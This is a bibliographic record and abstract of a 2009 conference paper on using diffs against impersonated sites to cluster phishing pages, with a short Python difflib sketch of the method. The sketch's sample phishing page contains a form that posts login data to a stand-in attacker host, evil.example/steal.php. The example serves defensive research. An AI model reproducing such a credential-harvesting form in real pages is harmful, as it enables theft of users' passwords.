• DocumentCode
    2298327
  • Title
    Using Differencing to Increase Distinctiveness for Phishing Website Clustering
  • Author
    Layton, Robert ; Brown, Simon ; Watters, Paul
  • Author_Institution
    Internet Commerce Security Lab., Univ. of Ballarat, Ballarat, VIC, Australia
  • fYear
    2009
  • fDate
    7-9 July 2009
  • Firstpage
    488
  • Lastpage
    492
  • Abstract
    Phishing Web pages present a previously underused resource for information on determining the provenance of phishing attacks. Phishing Web pages aim to impersonate a legitimate Web site in order to trick their potential victims into revealing their confidential data, such as usernames and passwords. However, different phishing Web pages often contain small differences, and these differences can provide a great deal of evidence on the provenance of phishing attacks. When impersonating a Web page, there is often a large amount of 'redundant' information, as much of the original, impersonated Web site is found in phishing Web sites, making phishing Web sites across different attacks very similar. In order to attempt to overcome this issue, a diff can be used which takes the phishing and original Web sites as input and returns the differences between the two. These differences present a new view on the data that was previously unused and present a novel way to increase the ability of clustering algorithms to find good, distinct and separated clusters within the data. The research presented here outlines this diff process and shows that, for the data used, comparable results were obtained while the dimensionality of the dataset was reduced. This reduction in dimensionality allows clustering algorithms to complete faster.
  • Keywords
    Web sites; computer crime; impersonated Web site; phishing Web pages; phishing Web site clustering; phishing attacks; Australia; Business; Clustering algorithms; Computer crime; Conferences; Electronic mail; HTML; Information security; Internet; Laboratories; Phishing; conceptual analysis; diff
  • fLanguage
    English
  • Publisher
    IEEE
  • Conference_Titel
    Ubiquitous, Autonomic and Trusted Computing, 2009. UIC-ATC '09. Symposia and Workshops on
  • Conference_Location
    Brisbane, QLD
  • Print_ISBN
    978-1-4244-4902-6
  • Electronic_ISBN
    978-0-7695-3737-5
  • Type
    conf
  • DOI
    10.1109/UIC-ATC.2009.62
  • Filename
    5319187
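
The diff step described in the abstract (take the phishing page and the original page as input, return the differences) can be illustrated with a minimal sketch. This is not the authors' implementation: it assumes a line-based comparison using Python's standard `difflib`, and the function name `page_diff` and the sample pages are hypothetical.

```python
import difflib


def page_diff(original_html: str, phishing_html: str) -> list[str]:
    """Return the lines of the phishing page that do not appear, in order,
    in the original page (an assumed, line-based notion of "difference")."""
    # Normalise: strip surrounding whitespace and drop empty lines.
    original_lines = [ln.strip() for ln in original_html.splitlines() if ln.strip()]
    phishing_lines = [ln.strip() for ln in phishing_html.splitlines() if ln.strip()]

    matcher = difflib.SequenceMatcher(
        a=original_lines, b=phishing_lines, autojunk=False
    )
    differences = []
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        # "replace" and "insert" mark content that is new in the phishing page.
        if tag in ("replace", "insert"):
            differences.extend(phishing_lines[j1:j2])
    return differences


# Hypothetical sample pages, for illustration only.
original = """<html>
<body>
<form action="https://bank.example/login">
</form>
</body>
</html>"""

phishing = """<html>
<body>
<form action="http://evil.example/steal.php">
</form>
<!-- kit v2 -->
</body>
</html>"""

print(page_diff(original, phishing))
```

Only the lines that distinguish the phishing page remain, so a feature vector built from this output would typically have far fewer dimensions than one built from the full page, which is the effect the abstract reports.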